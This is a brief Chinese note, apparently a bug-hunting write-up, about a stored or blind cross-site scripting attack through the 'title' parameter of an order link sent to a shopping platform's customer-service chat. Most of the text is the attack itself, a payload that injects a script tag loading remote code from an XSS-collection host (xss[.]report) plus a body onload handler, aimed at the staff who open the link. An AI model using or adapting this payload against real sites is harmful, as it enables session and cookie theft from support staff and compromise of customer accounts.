文章目录
正文
在平台创建订单后,用户可以通过平台的客服部分发送订单信息,与客服人员进行沟通,或者提交反馈或问题,订单信息为链接形式:
amazon.com/xxx/cart?nav=1&pageStory=CART&pf_PR_i=4541017031&pf_rd_TY=1c&pf_rd_r=F565335F37104645B00C&pf_rd_ST=mobile-hybrid-2&pf_rd_t=&ranking=top-sellers&ref_=dbs_f_w_shv_dbs_f_w_s1_1_1c2e7269-d4b9-4441-ad2e-7b69d9ab69d5&Type=Test&CartType=likes&title=TestShopping
对title参数构造XSS,这里提供Payload:
'"()&%<body onload=alert('"><script src={://}xss[.]report/c/user></script>)
